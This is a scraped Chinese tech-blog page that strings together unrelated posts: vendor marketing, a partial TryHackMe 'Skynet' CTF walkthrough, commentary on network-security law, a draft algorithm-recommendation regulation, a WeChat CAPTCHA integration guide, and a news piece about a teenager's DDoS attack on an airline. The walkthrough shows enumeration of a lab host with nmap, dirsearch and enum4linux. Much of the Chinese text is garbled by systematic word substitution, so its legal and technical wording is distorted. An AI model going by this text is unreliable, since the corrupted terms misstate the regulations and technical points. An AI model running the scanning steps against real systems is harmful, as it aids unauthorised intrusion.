顶象是国内当先的业务平安公司,旨在帮忙企业构建自主可控的业务平安体系,实现业务的可持续增长。作为CNNVD(国家信息安全破绽库)、CICSVD(国家工业信息安全破绽库)、CNCERT(国家互联网应急核心)技术撑持单位和信创工委会会员单位,顶象自主研发了全链路的风控中台产品矩阵体系,包含设施指纹、无感验证、实时决策平台、端加固、数据采集爱护、工业硬件爱护、模型平台、关联网络平台、常识图谱等风控、平安和人工智能产品,无效保障了企业的业务利用和基础设施平安。 以顶象平安防护OT-Guard产品为例,通过对PLC设施的异样申请频率、畸形数据包、生疏设施类型等的实时监控,可能实时发现破绽,被广泛应用于石油石化、能源电力、轨道交通、智能制作等工业畛域。 顶象平安防护OT-Guard产品四大性能: 1.实时监测拦挡危险,平安防护OT-guard是顶象专门针对工业管制网络的信息安全防护产品,实时检测并拦挡工控设施面临的危险。2.毫秒级实时决策分析能力:OT-guard采纳直路部署,具备毫秒级实时决策和智能剖析能力,独有齐备的威逼发现和防御能力。3.深度解析工业控制协议,实时检测异样:通过对工业控制协议的通信报文进行深度解析,可能实时检测针对工业协定、工控破绽、蠕虫、病毒的攻打,及时发现误操作、违规操作、非法设施接入等异样。4.实时报警并详实记录:实时报警并详实记录,包含指令级的所有网络通信行为,为工业控制系统的安全事故考察提供松软的根底。顶象平安防护OT-Guard不仅可能深刻生产终端精细化的爱护每台生产设施的信息安全,例如压缩机、压力阀门、管道泵等底层外围生产设施,还应用先进人工智能与深度平安技术实现对工业企业的平安赋能,防止工业企业蒙受损失。在使用这些技术根底之上,搭建平安可信的网络,实现用户网络安全资源的无效整合、治理与监管,这既能解决用户的事实需要,又能达到无效晋升用户网络安全防御能力的目标。

September 3, 2021 · 1 min · jiezi

关于安全:tryhackmeSkynet远程文件包含漏洞cron任务通配符提权

服务扫描┌──(rootkali)-[~]└─# nmap -sV 10.10.166.193 255 ⨯Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 05:18 EDTNmap scan report for 10.10.111.23Host is up (0.32s latency).Not shown: 994 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))110/tcp open pop3 Dovecot pop3d139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 22.67 seconds目录爆破└─# python3 dirsearch.py -u http://10.10.166.193 -e * -t 50 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: CHANGELOG.md | HTTP method: get | Threads: 50 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-08-31_05-34-51.logTarget: http://10.10.166.193[05:34:52] Starting: [05:34:58] 301 - 312B - /admin -> http://10.10.111.23/admin/[05:34:59] 200 - 523B - / [05:35:00] 301 - 310B - /css -> http://10.10.111.23/css/[05:35:03] 301 - 309B - /js -> http://10.10.111.23/js/[05:35:06] 301 - 313B - /config -> http://10.10.111.23/config/[05:35:19] 301 - 309B - /ai -> http://10.10.111.23/ai/[05:37:06] 301 - 319B - /squirrelmail -> http://10.10.111.23/squirrelmail/枚举samba服务枚举用户,能够用空会话登录┌──(rootkali)-[~]└─# enum4linux -U 10.10.166.193 255 ⨯Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 1 02:38:03 2021 ========================== | Target Information | ========================== Target ........... 10.10.166.193RID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.166.193 | ==================================================== [+] Got domain/workgroup name: WORKGROUP ===================================== | Session Check on 10.10.166.193 | ===================================== [+] Server 10.10.166.193 allows sessions using username '', password '' =========================================== | Getting domain SID for 10.10.166.193 | =========================================== Domain Name: WORKGROUPDomain Sid: (NULL SID)[+] Can't determine if host is part of domain or part of a workgroup ============================= | Users on 10.10.166.193 | ============================= index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc: user:[milesdyson] rid:[0x3e8]enum4linux complete on Wed Sep 1 02:38:20 2021枚举分享目录┌──(rootkali)-[~]└─# enum4linux -S 10.10.166.193Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 1 02:41:21 2021 ========================== | Target Information | ========================== Target ........... 10.10.166.193RID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.166.193 | ==================================================== [+] Got domain/workgroup name: WORKGROUP ===================================== | Session Check on 10.10.166.193 | ===================================== [+] Server 10.10.166.193 allows sessions using username '', password '' =========================================== | Getting domain SID for 10.10.166.193 | =========================================== Domain Name: WORKGROUPDomain Sid: (NULL SID)[+] Can't determine if host is part of domain or part of a workgroup ========================================= | Share Enumeration on 10.10.166.193 | ========================================= Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk Skynet Anonymous Share milesdyson Disk Miles Dyson Personal Share IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))SMB1 disabled -- no workgroup available[+] Attempting to map shares on 10.10.166.193//10.10.166.193/print$ Mapping: DENIED, Listing: N/A//10.10.166.193/anonymous Mapping: OK, Listing: OK//10.10.166.193/milesdyson Mapping: DENIED, Listing: N/A//10.10.166.193/IPC$ [E] Can't understand response:NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*enum4linux complete on Wed Sep 1 02:41:44 2021连贯smbsmbclient //10.10.166.193/anonymous ...

September 3, 2021 · 6 min · jiezi

关于安全:多项法规今天生效网络安全主体责任将进一步落实

编者按 明天起,《数据安全法》《要害信息基础设施平安爱护条例》《网络产品安全漏洞治理规定》这三部对网络安全行业意义重大的政策法规正式施行,它们无一例外对企业的网络安全主体责任做了具体的明确和标准。 同样在明天实施的法规,还有新订正的《中华人民共和国平安生产法》。本文将以大家容易了解的“生产平安”作为比照和参照,来解读“网络安全”相干政策,探讨新规之下的企业和管理层该当如何转换视角,了解和践行肩负的网络安全主体责任。 作者:晓 丹编辑:罐 子专家反对:陈颢明 2021年6月,政府颁布了新订正的《中华人民共和国平安生产法》,将于9月1日正式实施,规定了管行业必须管平安、管业务必须管平安、管生产经营必须管平安,进一步明确平安生产责任。 2021年8月,《党委(党组)网络安全工作责任制实施办法》颁布,从责任主体、责任范畴、责任事项、保障措施等范畴落实网络安全责任。 8月17日,《要害信息基础设施平安爱护条例》正式颁布,要求履行“一把手负责制”,并设置专门平安管理机构,进一步强化和落实要害信息基础设施运营者的主体责任。 短短3个月工夫,从生产平安到网络安全,主体责任相干问题先后通过多部法规政策的出台和订正进行了明确和细化。 为何对于企业平安主体责任愈发器重?法规对于平安的主体责任相干问题做了哪些规定?企业如何了解和落实本人的网络安全主体责任? 网络安全主体责任正在向生产平安看齐 生产平安问题从来是企业治理的重中之重,因为波及职工生命安全、老百姓人身财产平安的小事,安全事件假使产生,将对企业的经营收入、名声口碑等方面造成重大不利影响,是企业的生存性问题。 随同数字信息时代的慢步倒退,数字转型成为企业主广泛和迫切的诉求,网络安全也因而愈发被器重,既代表着一项科技硬实力指标,也成为企业必备的防守基本功,关乎企业倒退命根子。 生产平安主体责任曾经成为广泛共识通过多年的要求与具体实际,相干企业对生产平安的责任主体、责任范畴的界定了解较为清晰。比方在餐饮、制造业成熟的产业中,消防的主体责任根本已成常识,假如经营场所失火,经营者尽管是受害者然而也要负责任。不少企业外部还会将生产平安会作为罕用的工作机制和监管形式,确保从领导班子到生产线的器重。“三个必须”对主体责任再次进行压实新订正的《生产安全法》提出的“三个必须”——管行业必须管平安、管业务必须管平安、管生产经营必须管平安,除了强调“一把手”对本单位平安生产的主体责任之外,更要求建立健全全员平安生产责任制,让平安生产的责任清晰落实到全员。政策条例要求把网络安全与生产平安等同对待坦白说,网络安全目前在国内大多数企业中还没有失去应有的器重。有证券界分析师指出,国内网络安全占信息化的投入比例约为3%,而欧美等发达国家均在10%以上,相较甚远。现在《实施办法》和《爱护条例》的出台实质上就是明确企业一把手对企业网络安全负主体责任,只有出了网络安全事件,不仅企业会被问责,一把手也会受到较大影响。只有把网络安全与生产平安等同对待,能力真正抵挡危险,应答挑战。以民用交通行业为例,以往企业第一负责人会主抓生产平安,定期深刻查看,毕竟人命关天,出不得半点过错。随着数字化的推动和政策的落实,当前,企业第一负责人也必须以同样的器重水平对待网络安全,定期检查。 只管相较生产平安更为欠缺、成熟的体系,企业对网络安全重要水平的认知,对其主体责任的认知还有待更多工夫来积淀、塑造,但置信《实施办法》和《爱护条例》的出台正在关上这条“认知之路”,也为网络安全产业降级提供重要推动力。 政策对网络安全主体责任做了怎么的规定? 以后整个网络安全产业有组织、有目标的网络攻击能力强悍、频繁产生,重大影响企业经营流动与营收,甚至成为“黑灰产”追捧的财产明码。 网络安全产业的标准倒退一方面有赖于对“黑灰产”等违法犯罪行为进行无力的打击,另一方面也须要企业外部从组织架构、人员、技术等方面逐渐增强安全意识和防守能力。《实施办法》《爱护条例》的配套出台就是对企业平安能力晋升的倒逼伎俩。 其中,《实施办法》将平安的责任从上到下,从执行、监管、问责的全周期管理体系进行了非常粗疏的具体和残缺,意味着国家对于网络安全畛域管理者的平安责任要求越来越高。具体体现为如下几个方面: 1.《实施办法》明确要求一把手作为网络安全第一责任人《实施办法》第二条规定,各级对本地区本部门网络安全工作负主体责任,领导班子次要负责人是第一责任人,主管网络安全的领导班子成员是间接责任人。过来,企业的网络安全通常由信息管理部间接负责,归CIO(首席信息官)兼顾治理,CIO招募管理员治理企业的网络安全。但当初,很多企业曾经成立了信息安全治理委员会来兼顾整个企业的信息安全管理工作,委员会的第一负责人即企业的第一负责人。这也意味着,一旦产生网络安全事变,企业一把手作为平安的第一负责人将会被间接追责。 2.《实施办法》首次明确网络安全被纳入审计范畴 《实施办法》第十一条规定,各级审计机关在无关部门和单位的审计中,该当将网络安全建设和绩效纳入审计范畴。咱们通常认为波及到企业的财政、资金、经济相干的事项才须要审计,第十一条的规定正体现了网络安全曾经成为与财政、资金等同重要的事项。当网络安全被纳入审计监督范畴,将来也肯定会有配套的审计制度出台。通过审计制度来进行要求,各企业次要负责人对网络安全的器重水平和履职尽责的志愿势必将大大提高。 能够说《实施办法》的颁布推动网络安全成为CEO的策略关注问题,真正成为“一把手工程”。 结语 诚然网络安全主体责任的认知和具体实际与生产平安相比仍有较大差距,但随同着企业数字化的停顿放慢,更多法规政策对网络安全主体责任做明确和细分,造成更紧密、更欠缺的全周期管理体系,将会有越来越多企业领导层意识到网络安全的重要性,涌现更多具备参考性、可行性的案例实际。咱们也无妨期待,作为“一把手工程”的网络安全事业将迎来全新的、充满活力的产业风貌。

September 2, 2021 · 1 min · jiezi

关于安全:算法推荐规制互联网信息服务算法推荐管理规定征求意见稿公开征求意见

**互联网信息服务算法举荐治理规定 (征求意见稿)** 第一条 为了标准互联网信息服务算法举荐流动,保护国家平安和社会公共利益,爱护公民、法人和其余组织的合法权益,促成互联网信息服务衰弱倒退,弘扬社会主义外围价值观,依据《中华人民共和国网络安全法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》、《互联网信息服务治理方法》等法律、行政法规,制订本规定。 第二条 在中华人民共和国境内利用算法举荐技术提供互联网信息服务(以下简称算法举荐服务),实用本规定。法律、行政法规另有规定的,按照其规定。前款所称利用算法举荐技术,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息内容。 第三条国家网信部门负责全国算法举荐服务的监督管理执法工作。省、自治区、直辖市网信部门根据职责负责本行政区域内算法举荐服务的监督管理执法工作。 第四条算法举荐服务提供者提供算法举荐服务,该当恪守法律法规,尊重社会公德和伦理,恪守商业道德和职业道德,遵循公正偏心、公开通明、科学合理和诚实信用的准则。 第五条激励相干行业组织增强行业自律,建立健全自律制度和行业准则,组织制订行业标准,督促领导算法举荐服务提供者建立健全服务标准、依法提供服务并承受社会监督。 第六条 算法举荐服务提供者该当保持支流价值导向,优化算法举荐服务机制,踊跃流传正能量,促成算法利用向上向善。算法举荐服务提供者不得利用算法举荐服务从事危害国家平安、扰乱经济秩序和社会秩序、进犯别人合法权益等法律、行政法规禁止的流动,不得利用算法举荐服务流传法律、行政法规禁止的信息。 第七条 算法举荐服务提供者该当落实算法平安主体责任,建立健全用户注册、信息公布审核、算法机制机理审核、平安评估监测、安全事件应急处理、数据安全爱护和个人信息爱护等管理制度,制订并公开算法举荐相干服务规定,装备与算法举荐服务规模相适应的业余人员和技术撑持。 第八条算法举荐服务提供者该当定期审核、评估、验证算法机制机理、模型、数据和利用后果等,不得设置诱导用户沉迷或者高额生产等违反公序良俗的算法模型。 第九条 算法举荐服务提供者该当增强信息内容治理,建立健全用于辨认守法和不良信息的特色库,欠缺入库规范、规定和程序。发现未作显著标识的算法生成合成信息的,该当作出显著标识后,方可持续传输。 发现守法信息的,该当立刻进行传输,采取打消等处理措施,避免信息扩散,保留无关记录,并向网信部门报告。发现不良信息的,该当依照网络信息内容生态治理无关规定予以处理。 第十条算法举荐服务提供者该当增强用户模型和用户标签治理,欠缺记入用户模型的趣味点规定,不得将守法和不良信息关键词记入用户趣味点或者作为用户标签并据以推送信息内容,不得设置歧视性或者偏见性用户标签。 第十一条 算法举荐服务提供者该当增强算法举荐服务版面页面生态治理,建设欠缺人工干预和用户自主抉择机制,在首页首屏、热搜、精选、榜单类、弹窗等重点环节踊跃出现合乎支流价值导向的信息内容。 第十二条算法举荐服务提供者该当综合使用内容去重、打散干涉等策略,并优化检索、排序、抉择、推送、展现等规定的透明度和可解释性,防止对用户产生不良影响、引发争议纠纷。 第十三条 算法举荐服务提供者不得利用算法虚伪注册账号、非法交易账号、操纵用户账号,或者虚伪点赞、评论、转发、网页导航等,施行流量造假、流量劫持;不得利用算法屏蔽信息、适度举荐、操纵榜单或者检索后果排序、管制热搜或者精选等干涉信息出现,施行自我虐待、不正当竞争、影响网络舆论或者躲避监管。 第十四条 算法举荐服务提供者该当以显著形式告知用户其提供算法举荐服务的状况,并以适当形式公示算法举荐服务的基本原理、目标用意、运行机制等。 第十五条算法举荐服务提供者该当向用户提供不针对其集体特色的选项,或者向用户提供便捷的敞开算法举荐服务的选项。用户抉择敞开算法举荐服务的,算法举荐服务提供者该当立刻进行提供相干服务。算法举荐服务提供者该当向用户提供抉择、批改或者删除用于算法举荐服务的用户标签的性能。用户认为算法举荐服务提供者利用算法对其权利造成重大影响的,有权要求算法举荐服务提供者予以阐明并采取相应改良或者补救措施。 第十六条 算法举荐服务提供者向未成年人提供服务的,该当依法履行未成年人网络爱护任务,并通过开发适宜未成年人应用的模式、提供适宜未成年人特点的服务等形式,便当未成年人获取无益身心健康的信息内容。算法举荐服务提供者不得向未成年人用户推送可能引发未成年人模拟不平安行为和违反社会公德行为、诱导未成年人不良嗜好等可能影响未成年人身心健康的信息内容,不得利用算法举荐服务诱导未成年人沉迷网络。 第十七条 算法举荐服务提供者向劳动者提供工作调度服务的,该当建设欠缺平台订单调配、报酬形成及领取、工作工夫、奖惩等相干算法,履行劳动者权利保障任务。 第十八条算法举荐服务提供者向消费者销售商品或者提供服务的,该当爱护消费者合法权益,不得依据消费者的偏好、交易习惯等特色,利用算法在交易价格等交易条件上履行不合理的差别待遇等违法行为。 第十九条国家网信部门建设分类分级管理制度,依据算法举荐服务的舆论属性或者社会动员能力、内容类别、用户规模、算法举荐技术解决的数据敏感水平、对用户行为的干涉水平等对算法举荐服务提供者施行分类分级管理。 第二十条 具备舆论属性或者社会动员能力的算法举荐服务提供者该当在提供服务之日起十个工作日内通过互联网信息服务算法备案零碎填报服务提供者的名称、服务模式、应用领域、算法类型、算法自评估报告、拟公示内容等信息,履行备案手续。算法举荐服务提供者的备案信息产生变更时,该当在变更之日起五个工作日内解决变更手续。算法举荐服务提供者终止服务的,该当在终止服务三十个工作日前解决登记备案手续,并作出妥善安顿。 第二十一条国家和省、自治区、直辖市网信部门收到备案人提交的备案资料后,资料齐全的,该当在三十个工作日内予以备案,发放备案编号并进行公示;资料不齐全的,不予备案,并该当在三十个工作日内告诉备案人并阐明理由。 第二十二条实现备案的算法举荐服务提供者该当在其对外提供服务的网站、应用程序等显著地位表明其备案编号并提供公示信息链接。 第二十三条 具备舆论属性或者社会动员能力的算法举荐服务提供者该当依照国家有关规定发展平安评估。算法举荐服务提供者该当欠缺算法举荐服务管理机制,对算法举荐服务日志等信息进行留存,留存期限不少于六个月,并在相干执法部门依法查问时予以提供。 第二十四条国家和省、自治区、直辖市网信部门会同无关主管部门对算法举荐服务发展算法平安评估和监督查看工作,对发现的问题及时提出整改意见并限期整改。 算法举荐服务提供者该当配合无关主管部门依法施行的平安评估和监督查看工作,并提供必要的技术、数据等反对和帮助。 第二十五条参加算法举荐服务平安评估和监督查看的相干机构和人员该当对在履行职责中知悉的个人信息、隐衷和商业秘密严格窃密,不得泄露、发售或者非法向别人提供。 第二十六条算法举荐服务提供者该当承受社会监督,设置便捷的投诉举报入口,及时受理和解决公众投诉举报。算法举荐服务提供者该当建设用户申述渠道和制度,标准解决用户申述并及时反馈,切实保障用户合法权益。 第二十七条算法举荐服务提供者违反本规定第七条、第八条、第九条第一款、第十条、第十一条、第十二条、第十三条、第十四条、第十五条第二款、第二十二条、第二十六条规定的,由国家和省、自治区、直辖市网信部门根据职责给予正告、通报批评,责令限期改过;拒不改过或者情节严重的,责令暂停信息更新,并处五千元以上三万元以下罚款。形成违反治安管理行为的,依法给予治安管理处罚;构成犯罪的,依法追究刑事责任。 第二十八条算法举荐服务提供者违反本规定第六条、第九条第二款、第十五条第一款、第三款、第十六条、第十七条、第十八条、第二十三条、第二十四条第二款规定的,由网信等无关主管部门根据职责,依照无关法律、行政法规和部门规章的规定予以解决。 第二十九条具备舆论属性或者社会动员能力的算法举荐服务提供者违反本规定第二十条的规定,未依照要求备案或者在报送备案时瞒哄无关状况、提供虚伪资料或者通过坑骗、贿赂等不正当伎俩获得备案的,由国家和省、自治区、直辖市网信部门依法撤销备案,并给予正告、通报批评,责令限期改过;拒不改过或者情节严重的,责令暂停信息更新,并处五千元以上三万元以下罚款。具备舆论属性或者社会动员能力的算法举荐服务提供者终止服务未依照要求及时处理登记备案手续,或者产生重大守法情景受到撤消互联网信息服务许可、敞开网站、终止服务等行政处罚的,由国家和省、自治区、直辖市网信部门予以登记备案。 第三十条本规定自2021年 月 日起实施。

August 27, 2021 · 1 min · jiezi

关于安全:新手指南顶象验证码如何接入微信小程序

自2017年小程序公布以来,通过4年的疾速倒退,小程序未然成为企业互联网布局不可或缺的一环。无论是互联网企业还是拥抱互联网的传统企业,无论是服务导向型企业还是产品导向型企业,小程序都为用户提供了一种轻量化的产品体验形式。当小程序越来越多的被不同群体所承受,对于小程序的开发也越来越“水涨船高”。 微信小程序面临的三类平安危险无论是社交电商、O2O模式以及游戏、社区,抑或是其余模式的小程序开发,其终极目标是晋升用户体验、更好地帮忙商家连接线上线下服务获取客户。小程序的平安稳固经营与验证在这一过程中起到了至关重要的作用。小程序的平安问题次要集中在以下三方面: 1.小程序与微信交互存在平安问题。与微信的交互只能应用其提供的API进行,对这些API标准的应用会导致平安问题。2.小程序与第三方服务器的业务逻辑交互存在问题。这是平安最单薄的环节,业务逻辑多种可能存在危险或破绽,如用户信息透露、订单盗刷、信息安全。3.第三方服务器Web服务危险。Web服务器中存在的危险,如存储型XSS攻打、SQL注入、管理员口令泄露。具体的危险包含,薅羊毛、仿冒山寨、数据爬取等问题。小程序尽管业务模块相较APP会精简许多,然而依然会有注册、登录等重要的业务入口。这些入口在传统平台上往往也是机器流量攻打的首要指标。统计显示,在2021年上半年数据中,小程序端的验证数据次要来源于登录注册,其次是搜寻查问和领取下单。 顶象“无感验证”验证码如何接入微信小程序? 顶象“无感验证”集设施指纹、行为校验、操作校验、地理位置校验等多项性能与一身,基于操作者行为及环境信息等数据信息,联合模型和风控剖析。依据用户的危险水平,采取不同难度的验证形式,平安用户无感知通过,防止歹意攻打带来的业务损失,留存实在用户,可能保障百万小程序平安运行。 目前,顶象“无感验证”验证码接入微信小程序的形式有两种,一种是插件式接入,一种是跳转式接入。 插件式接入微信小程序 1)用管理员身份登录微信公众平台,请应用须要接入小程序的相干账号(微信公众平台采纳不同账号辨别,公众号的后盾和小程序的后盾别离为不同账号),顺次点击:设置-第三方服务-增加插件,而后输出关键字“顶象”并搜寻,如下图所示:  2)获取密钥。未注册用户可在顶象官网进行账号注册,创立利用获取利用密钥AppID和AppSecret。3)集成插件。申明插件:在app.json中申明插件。 跳转式接入微信小程序 1)用管理员身份登录微信公众平台,请应用须要公众号的相干账号(微信公众平台采纳不同账号辨别,公众号的后盾和小程序的后盾别离为不同账号),顺次点击:小程序-小程序管理-增加-关联小程序,而后输出小程序AppID“wx82db4a59175bdfdf”并搜寻,如下图所示: 2)获取密钥。未注册用户可在顶象官网进行账号注册,创立利用获取利用密钥AppID和AppSecret。3)小程序集成。首先,通过navigator组件跳转至顶象验证码。.wxml<navigator target="miniProgram"app-id="wx82db4a59175bdfdf"path="/pages/captcha/captcha"extra-data="{{options}}"> <button>登陆</button></navigator>.jsPage({ data: { options: { appId: '这里填写在顶象官网申请到的appId', customStyle: { panelBg: '', captchaBgColor: '' } }}})参数阐明:参数 值 阐明appId String 这里填写在顶象官网申请到的appId,留神必须填写正确,否则会报:性能无奈应用customStyle Object 自定义款式对象,panelBg为整个页面的background属性,captchaBgColor为验证码的background-color属性 而后,在顶象验证码中验证。最初,验证胜利。验证后果会在调用方app.js中顶onShow生命周期办法中取到。if (options.scene === 1038 && options.referrerInfo.appId === 'wx82db4a59175bdfdf') { const result = options.referrerInfo.extraData; if (result) { console.log('返回后果:', result)} else {// 用户点击右上角敞开了验证码 }}验证后果阐明:参数 值 阐明success Boolean 验证成功失败token String 验证胜利才有:tokenmsg String 验证失败或参数不非法才有:错误信息 顶象“无感验证”微信小程序的常见问题问:生产控制台配置的是图标点选形式,小程序里显示的为什么还是滑块形式? 答:小程序的验证码类型目前首次只反对滑块验证,二次验证形式只反对图文点选验证。 请确认小程序的配置验证形式正确,可在 控制台->无感验证->场景治理页面 ,抉择对应的场景(你所接入的小程序名)来编辑验证形式。 问:微信小程序如何接入ConstIDServer地址? 答:小程序ConstIDServer地址以 /udid/ w1 结尾,如https://host/udid/w1。 ...

August 27, 2021 · 1 min · jiezi

关于安全:机票系统被17岁少年攻破民航安全再成行业热议

不久前,中国青年报报道了一起《00后利用黑客伎俩攻破民航机票零碎》的案件,引发热议。 受新冠变异病毒影响,一些国内航线机票紧缺,有的航线花高价也是一票难求。买不到回国机票的17岁少年小陈激动之下,通过黑客伎俩攻打航空公司零碎,以致该航空公司对外服务网络全面瘫痪近四小时!超过5000万用户受到影响! 据悉,小陈先是向国内某航空公司发送威逼邮件,并在境外网站购买攻打套餐,利用DDoS等攻打伎俩,屡次、继续攻打某航空公司客票等计算机系统,给该航空公司造成微小经济损失与负面网络舆论评估。 最终,小陈不得不用四年的牢狱生存为本人的一时冲动买单。 航空机票零碎因一个黑客的DDoS攻打而瘫痪,不仅票务零碎崩了,甚至影响了航行和运控系统,霎时成为微博的热门探讨话题。一方面,小陈自15岁起便自学数字货币开发、大数据、区块链技术、人工智能,本该有着大好的前程,却因贪图“一时之快”触犯了法律,令人为之扼腕;另一方面,民航业的网络安全问题也值得咱们进一步探讨。 依据腾讯此前公布的《2020年DDoS威逼报告》显示,仅在2020年,全网DDoS攻打次数就比2019年同期翻了一倍、超大规模攻打更是迅猛增长。与此同时,随着民航业数字化的深刻,病毒肆虐、黑客攻击、敏感信息泄露无一不在影响民航信息系统的失常运行和业务的失常发展,对此,民航业也拉响了平安警报。 细数民航业多起信息安全事件迄今为止,对民航部门的网络攻击水平不高,影响无限,但胜利的歹意网络攻击对民用航空经营的结果可能是灾难性的。尤其近年来,黑客针对民航零碎的攻打越来越频繁,造成的影响和损失也越来越大。 2015年10月,日本成田机场与中部机场受到黑客攻击。攻打造成成田机场的官方网站无奈连入,该状况继续了约8小时;同一时间,日本中部机场的计算机系统也受到攻打。所幸是在深夜时候,没有对机场营运造成重大影响。 2015年12月,乌克兰首辅国内机场蒙受Black Energy 病毒攻打,导致机场信息系统中断,影响到机场业务的失常运行。 2016年7月,河内和胡志明这两家越南最次要的机场,其航班资讯、柜台报到零碎显示屏忽然扭转,局部航班被迫提早腾飞。 2017年6月,乌克兰首辅国内机场再次蒙受到勒索病毒的攻打,机场信息系统瘫痪,导致大量旅客滞留机场,航班大面积延误。 除了上述国外攻打事件,国内企业也常常蒙受网络攻击。 很多机场都蒙受过ARP病毒、勒索病毒以及DDoS的攻打,同时黑客对民航机场的浸透攻打也每每产生。 民航业信息系统被列为国家要害基础设施和重要信息系统,各航空公司、机场也反馈迅速,加大对信息安全建设的投入,包含从IAM(身份辨认与拜访治理)、通信和网络安全、平安架构和零碎等多个方面晋升IT平安技术能力,同时,增强员工的安全意识培训,建立正确的网络安全观。 平安根底建设重要性日益凸显以后模式下,航空公司面临多种的平安问题和挑战,平安根底建设的重要性日益凸显,须要对应的平安解决方案来保障民航业的各个经营环节和服务环节。 1.民航信息系统平安 民航信息安全关乎航运业务的安稳运行。一旦民航信息系统被攻打、无线电通信零碎受烦扰、重要旅客信息被泄密、信息系统呈现故障等,都会使航行平安受到严重威胁,轻者会造成航班失常运行中断,重者会危及航行平安。这样一来,如何保障数据在辨认、应用、生产过程中的平安,是民航业平安防护工作不可漠视的局部。 2.空管系统安全空管 零碎决定着飞机的航行路线。当空管零碎遭逢办公网病毒、机场接入节点病毒入侵、近程保护业务零碎危险、数据被篡改等危险时,将造成不可估量的结果。因而,企业须要通过终端平安治理、网络准入、数据库操作审计、数据加密等伎俩,保障系统安全。 3.航空业务办公平安 在办公终端平安方面,航空公司数据简单繁多,企业外部数据流通容易呈现问题,特地是源码平安,数据安全,这些都无奈失去保障。为了帮忙民航企业实现终端在任意网络环境中都能平安、稳固、高效地拜访企业资源及数据,腾讯等各大平安厂商纷纷推出了适配近程办公的企业办公平安解决方案,为整个民航业平安能力建设提供了重要的信息化撑持。这也让零信赖平安在大型网络场景下的可行性失去了进一步验证。 总的来说,民航网络安全还有微小的倒退空间,亟需以航空安全问题为切入口,构建网络安全体系,让民航企业与网络安全企业协同单干,独特对待挑战和潜在的解决方案,一起进步民航整体对危险的意识和加强应变能力。

August 25, 2021 · 1 min · jiezi